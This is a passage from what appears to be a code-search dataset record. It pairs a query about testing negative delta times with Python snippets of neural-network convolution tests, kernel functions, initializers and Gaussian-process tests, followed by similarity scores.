use_bias):\n\n batch_size = 5\n in_height = in_width = 32\n in_channels = out_channels = 5\n kernel_shape_h = kernel_shape_w = 3\n\n inputs = tf.placeholder(\n tf.float32,\n shape=[None, None, None, in_channels],\n name=\"inputs\")\n\n conv1 = snt.Conv2D(\n name=\"conv1\",\n output_channels=out_channels,\n kernel_shape=[kernel_shape_h, kernel_shape_w],\n padding=snt.SAME,\n stride=1,\n use_bias=use_bias)\n\n output = conv1(inputs)\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n output_eval = output.eval({\n inputs: np.zeros([batch_size, in_height, in_width, in_channels])})\n\n self.assertEqual(\n output_eval.shape,\n (batch_size, in_height, in_width, out_channels))", "def testInitializers(self, use_bias):\n w = random.random()\n b = random.random()\n\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n err = \"Initializer for 'w' is not a callable function or dictionary\"\n with self.assertRaisesRegexp(TypeError, err):\n snt.Conv2D(output_channels=10, kernel_shape=3, stride=1, name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def testMaskErrorIncompatibleRank2(self):\n\n np_mask = np.ones((3, 3))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def normc_init(std=1.0, axis=0):\n def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))\n return tf.constant(out)\n return _initializer", "def test_truncate2():\n X = rand(5,5,5)\n T = hosvd(X)\n k = 3\n Tk = T.truncate(k)\n E = X - Tk.asarray()\n Cdk = T.X\n Cdk[:k,:k,:k] = 0\n assert np.allclose(fro_norm(E), fro_norm(Cdk))", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv2D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def KernelTest(x, y):\n\n Result = (np.dot(x_test[x, :], x_train[y, :])+1)**5 # Polynomial\n # Result = (np.dot(x_train[x, :], x_train[y, :])+1) # Linear\n # Sum = DotProduct(x, y)\n #Sum = 0.0\n #for i in range(2):\n # Sum = Sum + x_train[x, i]*x_train[y, i]\n # Result = (Sum+1)**5\n \"\"\"\n #Gaussian\n sigma = 1\n if np.ndim(x_test[x, :]) == 1 and np.ndim(x_train[y, :]) == 1:\n Result = np.exp(- (np.linalg.norm(x_test[x, :] - x_train[y, :], 2)) ** 2 / (2 * sigma ** 2))\n elif (np.ndim(x_test[x, :]) > 1 and np.ndim(x_train[y, :]) == 1) or (np.ndim(x_test[x, :]) == 1 and np.ndim(x_train[y, :]) > 1):\n Result = np.exp(- (np.linalg.norm(x_test[x, :] - x_train[y, :], 2, axis=1) ** 2) / (2 * sigma ** 2))\n elif np.ndim(x_test[x, :]) > 1 and np.ndim(x_train[y, :]) > 1:\n Result = np.exp(- (np.linalg.norm(x[:, np.newaxis] - y[np.newaxis, :], 2, axis=2) ** 2) / (2 * sigma ** 2))\n \"\"\"\n return Result", "def init_vector(self,x,dim):\n if dim == \"noise\":\n self.prior.sqrtM.init_vector(x,1)\n else:\n self.prior.init_vector(x,dim)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def testInitializers(self, use_bias):\n\n w = random.random()\n b = random.random()\n conv1 = snt.Conv3D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 10, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 3, 3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n with self.assertRaises(TypeError):\n snt.Conv3D(output_channels=10, kernel_shape=3, stride=1, name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def testShapesNotKnown(self, use_bias):\n\n batch_size = 5\n in_length = 32\n in_channels = out_channels = 5\n kernel_shape = 3\n\n inputs = tf.placeholder(\n tf.float32,\n shape=[None, None, in_channels],\n name=\"inputs\")\n\n conv1 = snt.Conv1D(\n name=\"conv1\",\n output_channels=out_channels,\n kernel_shape=kernel_shape,\n padding=snt.SAME,\n stride=1,\n use_bias=use_bias)\n\n output = conv1(inputs)\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n output_eval = output.eval({\n inputs: np.zeros([batch_size, in_length, in_channels])})\n\n self.assertEqual(\n output_eval.shape,\n (batch_size, in_length, out_channels))", "def test_graphical_lasso_cov_init_deprecation():\n rng, dim, n_samples = np.random.RandomState(0), 20, 100\n prec = make_sparse_spd_matrix(dim, alpha=0.95, random_state=0)\n cov = linalg.inv(prec)\n X = rng.multivariate_normal(np.zeros(dim), cov, size=n_samples)\n\n emp_cov = empirical_covariance(X)\n with pytest.warns(FutureWarning, match=\"cov_init parameter is deprecated\"):\n graphical_lasso(emp_cov, alpha=0.1, cov_init=emp_cov)", "def testMask2D(self):\n mask = np.ones((3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 2))\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = np.reshape(np.array([6, 6, 6]), (1, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def test_matern_zero_lengthscale(matern):\n with pytest.raises(ValueError) as exp:\n matern(lengthscale=0.0, variance=1.0, output_dim=1)\n assert exp.value.args[0].find(\"lengthscale must be positive.\") >= 0", "def Kernel(x, y):\n\n Result = (np.dot(x_train[x, :], x_train[y, :])+1)**5 # Polynomial\n #Result = (np.dot(x_train[x, :], x_train[y, :])+1) # Linear\n #Gaussian\n \"\"\"\n sigma = 1\n if np.ndim(x_train[x, :]) == 1 and np.ndim(x_train[y, :]) == 1:\n Result = np.exp(- (np.linalg.norm(x_train[x, :] - x_train[y, :], 2)) ** 2 / (2 * sigma ** 2))\n elif (np.ndim(x_train[x, :]) > 1 and np.ndim(x_train[y, :]) == 1) or (np.ndim(x_train[x, :]) == 1 and np.ndim(x_train[y, :]) > 1):\n Result = np.exp(- (np.linalg.norm(x_train[x, :] - x_train[y, :], 2, axis=1) ** 2) / (2 * sigma ** 2))\n elif np.ndim(x_train[x, :]) > 1 and np.ndim(x_train[y, :]) > 1:\n Result = np.exp(- (np.linalg.norm(x[:, np.newaxis] - y[np.newaxis, :], 2, axis=2) ** 2) / (2 * sigma ** 2))\n \"\"\"\n return Result", "def test__get_conv_raise_dimension_error(N):\n with pytest.raises(ValueError):\n utils._get_conv(N)", "def init_Ks(self, kernels, noise):\n\n self.kernels = kernels\n self.noise = np.array([noise])\n self.construct_Ks()", "def test_fit_default_distribution(self):\n\n copula = GaussianMultivariate(GaussianUnivariate)\n copula.fit(self.data)\n\n for i, key in enumerate(self.data.columns):\n assert copula.columns[i] == key\n assert copula.univariates[i].__class__ == GaussianUnivariate\n assert copula.univariates[i]._params['loc'] == self.data[key].mean()\n assert copula.univariates[i]._params['scale'] == np.std(self.data[key])\n\n expected_covariance = copula._get_covariance(self.data)\n assert (copula.covariance == expected_covariance).all().all()", "def test_nu_large_recovers_rbf_kernel(x0: np.ndarray, x1: np.ndarray, input_dim: int):\n lengthscale = 1.25\n kernmat_rbf = kernels.ExpQuad(lengthscale=lengthscale, input_dim=input_dim)\n kernmat_matern = kernels.Matern(lengthscale=lengthscale, nu=15, input_dim=input_dim)\n np.testing.assert_allclose(\n kernmat_rbf(x0, x1),\n kernmat_matern(x0, x1),\n err_msg=\"RBF and Matern kernel are not equivalent for nu=infty.\",\n rtol=0.05,\n atol=0.01,\n )", "def test_zero(self):\n controller = LinearController(self.G, 2, mode='zero')\n sim = simulation.Simulation(self.G, controller, dt=self.dt)\n sim.run(self.dt)\n\n self.assertAlmostEqual(np.linalg.norm(controller.W.ravel()), 0.0)\n self.assertAlmostEqual(np.linalg.norm(controller.out), 0.0)", "def __init__(self, variance):\n self.variance = variance", "def test_init(self):\n likelihoods.Gaussian()\n self._standard_likelihood()", "def __init__(self, sigma_initializer=RandomNormal(0, 1), spectral_iterations=1,\n fully_diff_spectral=True, stateful=False, renormalize=False, **kwargs):\n super(SNConditionalConv2D, self).__init__(**kwargs)\n self.sigma_initializer = keras.initializers.get(sigma_initializer)\n self.fully_diff_spectral = fully_diff_spectral\n self.spectral_iterations = spectral_iterations\n self.stateful = stateful\n self.renormalize = renormalize", "def kernel_test(l, v):\n\t\"Testing RBF and Matern kernels with: \"\n\tx = np.array([1,2,3,4])\n\ty = np.array([2,4,6])\n\tprint(x)\n\tprint(y)\n\tprint(\"RBF Kernel with l= \" + str(l) + \": \")\n\tprint(rbf_kernel(x,y,l))\n\tprint(\"Matern Kernel with l= \" + str(l) + \" and v= \" + str(v) + \": \")\n\tprint(matern_kernel(x,y,l, v))", "def test_ndim(self):\r\n # 'ndim' is an optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def normc_initializer(std=1.0):\n def _initializer(shape, dtype=None, partition_info=None): #pylint: disable=W0613\n out = np.random.randn(*shape).astype(np.float32)\n out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))\n return tf.constant(out)\n return _initializer", "def fixed(input_dim, K, variance=1.):\r\n part = parts.fixed.Fixed(input_dim, K, variance)\r\n return kern(input_dim, [part])", "def test_estimate_parameters():\n # a red image\n image = numpy.zeros((3, 11, 11))\n image[0, :, :] = 255\n skin_filter.estimate_gaussian_parameters(image)\n assert (skin_filter.mean == [1.0, 0.0]).all(), \"mean for a red image is not OK\"\n assert (skin_filter.covariance == [[0.0, 0.0], [0.0, 0.0]]).all(), \"covariance for red image is not OK\"\n\n # a green image\n image = numpy.zeros((3, 11, 11))\n image[1, :, :] = 255\n skin_filter.estimate_gaussian_parameters(image)\n assert (skin_filter.mean == [0.0, 1.0]).all(), \"mean for a green image is not OK\"\n assert (skin_filter.covariance == [[0.0, 0.0], [0.0, 0.0]]).all(), \"covariance for green image is not OK\"", "def testInitializers(self, use_bias):\n w = random.random()\n b = random.random()\n\n conv1 = snt.Conv1D(\n output_channels=1,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n use_bias=use_bias,\n name=\"conv1\",\n initializers=create_constant_initializers(w, b, use_bias))\n\n conv1(tf.placeholder(tf.float32, [1, 10, 2]))\n\n with self.test_session():\n tf.variables_initializer(\n [conv1.w, conv1.b] if use_bias else [conv1.w]).run()\n\n self.assertAllClose(\n conv1.w.eval(),\n np.full([3, 2, 1], w, dtype=np.float32))\n\n if use_bias:\n self.assertAllClose(\n conv1.b.eval(),\n [b])\n\n err = \"Initializer for 'w' is not a callable function or dictionary\"\n with self.assertRaisesRegexp(TypeError, err):\n snt.Conv1D(output_channels=10,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n use_bias=use_bias,\n name=\"conv1\",\n initializers={\"w\": tf.ones([])})", "def bias(input_dim, variance=1.):\r\n part = parts.bias.Bias(input_dim, variance)\r\n return kern(input_dim, [part])", "def initiategaussian(sd, x0):\n y = np.exp(-x**2/(2*sd**2))\n return y", "def testInputTypeError(self, use_bias):\n conv1 = snt.Conv2D(output_channels=1,\n kernel_shape=3,\n stride=1,\n padding=snt.SAME,\n name=\"conv1\",\n use_bias=use_bias,\n initializers=create_constant_initializers(\n 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def test_predict_uncertain_inputs(self):\n X = np.linspace(-5,5, 10)[:, None]\n Y = 2*X + np.random.randn(*X.shape)*1e-3\n m = GPy.models.BayesianGPLVM(Y, 1, X=X, kernel=GPy.kern.Linear(1), num_inducing=1)\n m.Gaussian_noise[:] = 1e-4\n m.X.mean[:] = X[:]\n m.X.variance[:] = 1e-5\n m.X.fix()\n m.optimize()\n X_pred_mu = np.random.randn(5, 1)\n X_pred_var = np.random.rand(5, 1) + 1e-5\n from GPy.core.parameterization.variational import NormalPosterior\n X_pred = NormalPosterior(X_pred_mu, X_pred_var)\n # mu = \\int f(x)q(x|mu,S) dx = \\int 2x.q(x|mu,S) dx = 2.mu\n # S = \\int (f(x) - m)^2q(x|mu,S) dx = \\int f(x)^2 q(x) dx - mu**2 = 4(mu^2 + S) - (2.mu)^2 = 4S\n Y_mu_true = 2*X_pred_mu\n Y_var_true = 4*X_pred_var\n Y_mu_pred, Y_var_pred = m.predict_noiseless(X_pred)\n np.testing.assert_allclose(Y_mu_true, Y_mu_pred, rtol=1e-3)\n np.testing.assert_allclose(Y_var_true, Y_var_pred, rtol=1e-3)", "def __init__(self):\n kernel=numpy.array([[0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4],\n [0.4, 0.4, 0.4, 0.4, 0.4]])\n VConvolutionFilter.__init__(self,kernel)", "def init():\n\tN = np.int32(DIM) #prepare for stitching\n\t#HII_DIM = np.int32(HII_DIM)\n\tf_pixel_factor = DIM/HII_DIM;\n\tscale = np.float32(BOX_LEN)/DIM\n\tHII_scale = np.float32(BOX_LEN)/HII_DIM\n\tshape = (N,N,N)\n\t\n\tMRGgen = MRG32k3aRandomNumberGenerator(seed_getter=seed_getter_uniform, offset=0)\n\n\tkernel_source = open(cmd_folder+\"/initialize.cu\").read()\n\tkernel_code = kernel_source % {\n\n\t\t'DELTAK': DELTA_K,\n\t\t'VOLUME': VOLUME,\n\t\t'DIM': DIM\n\t}\n\tmain_module = nvcc.SourceModule(kernel_code)\n\tinit_kernel = main_module.get_function(\"init_kernel\")\n\tHII_filter = main_module.get_function(\"HII_filter\")\n\tadj_complex_conj = main_module.get_function(\"adj_complex_conj\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d, np.int32(DIM), block=block_size, grid=grid_size)\n\n\t#import IPython; IPython.embed()\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d_imag, np.int32(DIM), block=block_size, grid=grid_size)\n\n\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\n\t#adj_complex_conj(largebox_d, DIM, block=block_size, grid=grid_size)\n\tlargebox = largebox_d.get()\n\t#np.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox)\n\n\t#save real space box before smoothing\n\tplan = Plan(shape, dtype=np.complex64)\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox_d.real.get_async())\n\n\t#save real space box after smoothing and subsampling\n\t# host largebox is still in k space, no need to reload from disk\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tHII_filter(largebox_d, N, ZERO, smoothR, block=block_size, grid=grid_size);\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tsubsample_kernel(largebox_d.real, smallbox_d, N, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_grid_size) #subsample in real space\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), smallbox_d.get_async())\n\n\t# reload the k-space box for velocity boxes\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\t\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,DIM), dtype=np.complex64)\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, np.int32(num), block=block_size, grid=grid_size)\n\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=grid_size)\n\t\tplan.execute(largevbox_d, inverse=True)\n\t\tlargevbox_d /= scale**3\n\t\t#import IPython; IPython.embed()\n\t\tsubsample_kernel(largevbox_d.real, smallbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_grid_size)\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallbox_d.get())\n\n\treturn", "def __init__(self,args, variance_epsilon=1e-12):\n super(BERTLayerNorm, self).__init__()\n self.gamma = nn.Parameter(torch.ones(args.input_dim))\n self.beta = nn.Parameter(torch.zeros(args.input_dim))\n self.variance_epsilon = variance_epsilon", "def testMask2D(self):\n mask = np.ones((3, 3), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(5, 5, 5, 5, 5))\n conv1 = snt.Conv3D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 135 * np.ones((5, 3, 3, 3, 1), dtype=np.float32)\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def testInputTypeError(self, use_bias):\n conv1 = snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n padding=snt.SAME,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n 1.0, 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def testKernelShape(self, out_channels, padding, use_bias, in_shape,\n out_shape, stride_shape, use_output_shape):\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3],\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=3,\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3],\n name=\"conv1\",\n use_bias=use_bias)\n\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3, 3, 3],\n name=\"conv1\",\n use_bias=use_bias)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def testMask3D(self):\n mask = np.ones((3, 3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def __init__(self, input_dim, variance=1., active_dims=None, ARD=False, name='basis func kernel'):\n super(BasisFuncKernel, self).__init__(input_dim, active_dims, name)\n assert self.input_dim==1, \"Basis Function Kernel only implemented for one dimension. Use one kernel per dimension (and add them together) for more dimensions\"\n self.ARD = ARD\n if self.ARD:\n phi_test = self._phi(np.random.normal(0, 1, (1, self.input_dim)))\n variance = variance * np.ones(phi_test.shape[1])\n else:\n variance = np.array(variance)\n self.variance = Param('variance', variance, Logexp())\n self.link_parameter(self.variance)", "def test_random_normal():\n tf.reset_default_graph()\n tf.random.set_random_seed(0)\n rnormal_class = INITIALIZER_REGISTRY['normal']\n rnormal_obj = rnormal_class({\"mean\":0.5, \"std\":0.1})\n tf_init = rnormal_obj.get_entity_initializer(init_type='tf')\n var1 = tf.get_variable(shape=(1000, 100), initializer=tf_init, name=\"var1\")\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n tf_var = sess.run(var1)\n np_var = rnormal_obj.get_entity_initializer(1000, 100, init_type='np')\n # print(np.mean(np_var), np.std(np_var))\n # print(np.mean(tf_var), np.std(tf_var))\n assert(np.round(np.mean(np_var),1)==np.round(np.mean(tf_var),1))\n assert(np.round(np.std(np_var),1)==np.round(np.std(tf_var),1))", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is the kernel\", kernel*sum_val)\n return kernel*sum_val", "def _init(module):\n classname = module.__class__.__name__\n if classname.find('Conv') != -1:\n try:\n nn.init.xavier_uniform_(module.weight.data)\n module.bias.data.fill_(0) # May fail.\n except AttributeError:\n pass", "def __init__(self, training_data, kernel, par_sigma, par_lambda):\n self.kernel = kernel\n self.par_sigma = par_sigma\n self.par_lambda = par_lambda\n self.training_data = training_data\n\n self.assert_data_shape(training_data)\n\n # train model\n k = self.kernel.get_kernel_matrix(training_data[0], training_data[0])\n u = scipy.linalg.cholesky(k + self.par_lambda * numpy.identity(k.shape[0]))\n beta = scipy.linalg.solve_triangular(u, training_data[1], trans='T')\n alpha = scipy.linalg.solve_triangular(u, beta)\n\n self.alpha = alpha.reshape(alpha.size, 1)\n self.u = u", "def test_regressors_error_without_target(sampling_method, RegressorKernelClass):\n boston = load_boston()\n\n with pytest.raises(ValueError):\n RegressorKernelClass(random_state=123).fit(boston.data)", "def test_inverted_variance(self):\n num_x = 150\n num_y = 100\n x_vals = np.linspace(0, 2 * np.pi, num_x)\n y_vals = (\n np.sin(x_vals[:num_y]) + 0.3 * np.random.randn(3, num_y) + 0.5)\n\n alpha = 1\n rmse_vals = []\n while True:\n try:\n y_pred_no_std = extrapolated_lowess(\n x_vals, y_vals.mean(axis=0), alpha=alpha)\n y_pred_with_std = extrapolated_lowess(\n x_vals, y_vals.mean(axis=0), alpha=alpha,\n y_std=y_vals.std(axis=0))\n\n # Ensure the use of standard-deviation has _some_ effect.\n assert not (y_pred_no_std == y_pred_with_std).all()\n\n y_rmse = root_mean_square_error(\n y_pred_with_std[:num_y], y_vals)\n rmse_vals.append(y_rmse)\n alpha -= 0.1\n except RuntimeError:\n # alpha is too small\n break\n except np.linalg.LinAlgError:\n # alpha is too small, resulted in singular matrix\n break\n\n # Ensure that with the use of standard-deviation doesn't prevent the\n # the fit from improving as some optimal alpha the RMSE is approached.\n assert len(rmse_vals) > 1\n assert (np.diff(np.array(rmse_vals)) < 0).all()", "def test_input_dimension(self):\n knn = Knn(n_neighbors=3)\n with self.assertRaises(ValueError): knn.fit(X_train, y_test)" ]
[ "0.64694107", "0.64663404", "0.63284683", "0.6302467", "0.60142285", "0.59726274", "0.5947721", "0.589947", "0.5893144", "0.589087", "0.5890487", "0.581995", "0.5760517", "0.57496685", "0.57280266", "0.5705864", "0.56650275", "0.5636754", "0.56325996", "0.56217444", "0.5600975", "0.5580089", "0.55646473", "0.5543633", "0.55286956", "0.5527734", "0.54987717", "0.5497852", "0.5476786", "0.5471861", "0.54651177", "0.54583573", "0.54377204", "0.5427197", "0.5398238", "0.5388321", "0.5366382", "0.5350962", "0.53482103", "0.534476", "0.53377503", "0.533679", "0.5300868", "0.5293731", "0.529332", "0.52679265", "0.5263247", "0.5260239", "0.5258857", "0.52582806", "0.5254969", "0.52490926", "0.52479935", "0.52441", "0.5243058", "0.5242397", "0.52362925", "0.52347744", "0.52347744", "0.5233527", "0.5224529", "0.52233964", "0.5220286", "0.52185374", "0.52142924", "0.5204711", "0.52029204", "0.5191662", "0.5189538", "0.5187917", "0.5178857", "0.5178784", "0.5175907", "0.51749945", "0.5174454", "0.51677895", "0.51650244", "0.5164427", "0.5160126", "0.5152518", "0.51464325", "0.5145921", "0.51407474", "0.513877", "0.5138092", "0.5134772", "0.5134417", "0.51339734", "0.51333207", "0.5132253", "0.5123863", "0.51216686", "0.5121536", "0.5117958", "0.511288", "0.51115364", "0.5108417", "0.51058435", "0.5105715", "0.51053727" ]
0.6615188
0
Test that the assertion fires for a negative delta time
def test_to_delta_time_positive_difference(with_tf_random_seed, np_time_points): time_points = tf.constant(np_time_points, dtype=default_float()) with pytest.raises(InvalidArgumentError) as exp: to_delta_time(time_points) assert exp.value.message.find("Condition x >= y") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_timeout_elapsed_no_exception(self):\n deadline = Deadline(-MS)\n timeout = deadline.timeout(raise_if_elapsed=False)\n self.assertGreater(timeout, -2 * MS)\n self.assertLess(timeout, -MS)", "def test_negative_timedelta(self):\n @converters.wrap\n def inner_test(param: datetime.timedelta):\n \"\"\"This shouldn't be called, converting should fail.\"\"\"\n pass\n self.assert_raises_request_error(\n lambda: inner_test(param='-60'), 3117\n )", "def test_validate_delta():\n with pytest.raises(ValueError):\n validate_delta(1.1)\n\n with pytest.raises(ValueError):\n validate_delta(-0.1)\n\n assert validate_delta(0.1) == 0.1", "def test_timestamp_minus(self, mock):\n mock.configure_mock(**(self.config_payload(-1, -2)))\n self.assertRaises(\n AssertionError,\n lf.lambda_handler, event=self.lambdaevent, context=None)\n mock.client.return_value.update_thing_shadow.assert_not_called()", "def _badness(self, time):\n return (time - self.expected_time)**2", "def test_subtract_all_args_less_zero(self):\n try:\n self.assertEqual(subtract(-18, -5), -13)\n except Exception as error:\n print(error)", "def test_negative_interval(self, Signal):\n blk = ElapsedTime()\n config = {\n 'enrich': {\n 'exclude_existing': True,\n },\n 'units': {\n 'days': '{{ $days }}',\n 'hours': '{{ $hours }}',\n 'minutes': 